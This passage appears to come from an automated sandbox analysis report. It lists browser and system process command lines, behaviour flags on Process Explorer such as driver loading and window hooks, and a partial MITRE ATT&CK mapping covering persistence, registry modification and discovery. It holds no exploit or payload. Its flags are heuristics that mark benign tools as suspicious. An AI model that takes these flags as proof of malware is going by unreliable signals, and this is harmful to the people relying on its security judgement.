  PID:4904
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --mojo-platform-channel-handle=2928 --field-trial-handle=1784,i,5275980141534430297,16209010259116206996,131072 /prefetch:1
  2⤵
  PID:1124
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=3292 --field-trial-handle=1784,i,5275980141534430297,16209010259116206996,131072 /prefetch:1
  2⤵
  PID:4300
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=5740 --field-trial-handle=1784,i,5275980141534430297,16209010259116206996,131072 /prefetch:1
  2⤵
  PID:4880
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5628 --field-trial-handle=1784,i,5275980141534430297,16209010259116206996,131072 /prefetch:8
  2⤵
  PID:4668
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5696 --field-trial-handle=1784,i,5275980141534430297,16209010259116206996,131072 /prefetch:8
  2⤵
  PID:3252

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:760

C:\Users\Admin\Downloads\ProcessExplorer\procexp64.exe
"C:\Users\Admin\Downloads\ProcessExplorer\procexp64.exe"
1⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Enumerates connected drives
- Suspicious use of NtCreateThreadExHideFromDebugger
- Checks SCSI registry key(s)
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: LoadsDriver
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2532

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" https://www.virustotal.com/about/terms-of-service
1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:1604
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7fffd16e46f8,0x7fffd16e4708,0x7fffd16e4718
  2⤵
  PID:4512
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,2519868858730545389,7768386330668643520,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:2
  2⤵
  PID:1620
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,2519868858730545389,7768386330668643520,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3
  2⤵
  PID:4996
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2100,2519868858730545389,7768386330668643520,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2704 /prefetch:8
  2⤵
  PID:1364
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2519868858730545389,7768386330668643520,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
  2⤵
  PID:2252
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2100,2519868858730545389,7768386330668643520,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3412 /prefetch:1
  2⤵
  PID:1852
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,2519868858730545389,7768386330668643520,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5528 /prefetch:8
  2⤵
  PID:3328
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2100,2519868858730545389,7768386330668643520,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5528 /prefetch:8
  2⤵
  PID:4568

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4280

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4532

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

System Information Discovery